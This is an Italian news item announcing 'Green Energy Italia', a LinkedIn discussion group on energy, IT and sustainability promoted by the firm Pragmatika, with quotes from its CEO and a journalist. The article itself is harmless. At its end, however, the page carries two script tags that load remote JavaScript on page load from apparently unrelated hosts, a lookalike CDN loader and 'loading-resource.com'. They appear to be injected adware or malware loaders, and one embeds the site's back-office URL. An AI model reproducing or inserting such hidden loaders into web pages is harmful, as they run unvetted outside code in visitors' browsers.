1. Home
  2. Notizie e Mercato
  3. “Green Energy Italia”, su Linkedin per parlare di IT, Energy, Ambiente

“Green Energy Italia”, su Linkedin per parlare di IT, Energy, Ambiente

Energie rinnovabili di
Annunciato oggi il debutto di un Gruppo “powered by Pragmatika” dedicato a professionisti del settore, CIO, Energy Manager, giornalisti, appassionati di tecnologie e sostenibilità


Efficienza energetica e cloud computing, agenda digitale e start-up green. Tecnologia e risparmio. Sono solo alcuni dei temi chiave che compongono l’agenda di “Green Energy Italia”, Gruppo Linkedin creato da alcuni professionisti della comunicazione in ambito energetico.

Uno spazio di discussione virtuale che idealmente si rivolge a professionisti del settore, giornalisti, influencer del Web e appassionati di nuove tecnologie ed energie rinnovabili. “Green Energy Italia” si pone l’obiettivo di condividere con iscritti e interlocutori spunti e informazioni spesso trattate con superficialità o poca attenzione dai mass media.

La convergenza tecnologica è un processo che sta cambiando il nostro vissuto a tutti i livelli: individuale e collettivo. Città e aziende sono destinate a diventare luoghi intelligenti, reti identitarie in cui il flusso di informazioni e relazioni (fisiche e digitali) è sempre più elevato e pervasivo. Le interazioni, da mero punto di contatto tra soggetti diversi, stanno diventando il vero capitale sociale di imprese, istituzioni e, quindi, famiglie.

Un cambiamento importante, quindi, che si riallaccia al più ampio concetto della gestione energetica di simili processi, ma che non trova nel nostro paese quei momenti di discussione e approfondimento necessari a dare maggiore visibilità, anche e soprattutto al di fuori dei circuiti di esperti e addetti ai lavori.

Si tratta di questioni di interesse comune – spiega Rossella Lucangelo, Ceo di Pragmatika, uno dei promotori dell’iniziativa - cui spesso non viene dato il giusto risalto. Nel nostro piccolo, cerchiamo di sopperire a questa lacuna, proponendo ai nostri interlocutori argomenti e contenuti originali, oppure fornendo chiavi di lettura alternative alle notizie riportate dalla stampa locale, nazionale e internazionale”.

Sono molto felice di supportare questa iniziativa. – sottolinea Piero Babudro, giornalista e social media manager. – Sono convinto della mancanza e della necessità di un’agorà digitale che si occupi di ‘green energy’ in Italia. Un argomento di grande interesse, eppure sottovalutato, che può avere ricadute economiche e sociali molto ampie. Importantissimo, quindi, valorizzarli, con i modi e i linguaggi più giusti. E i social network lo sono”.

Il Gruppo “Green Energy Italia” è raggiungibile al link http://linkd.in/W0XH0E L’iscrizione è libera, gratuita e soprattutto fortemente consigliata ai curiosi e a chi, in generale, non si accontenta delle versioni ufficiali.


<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script><script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>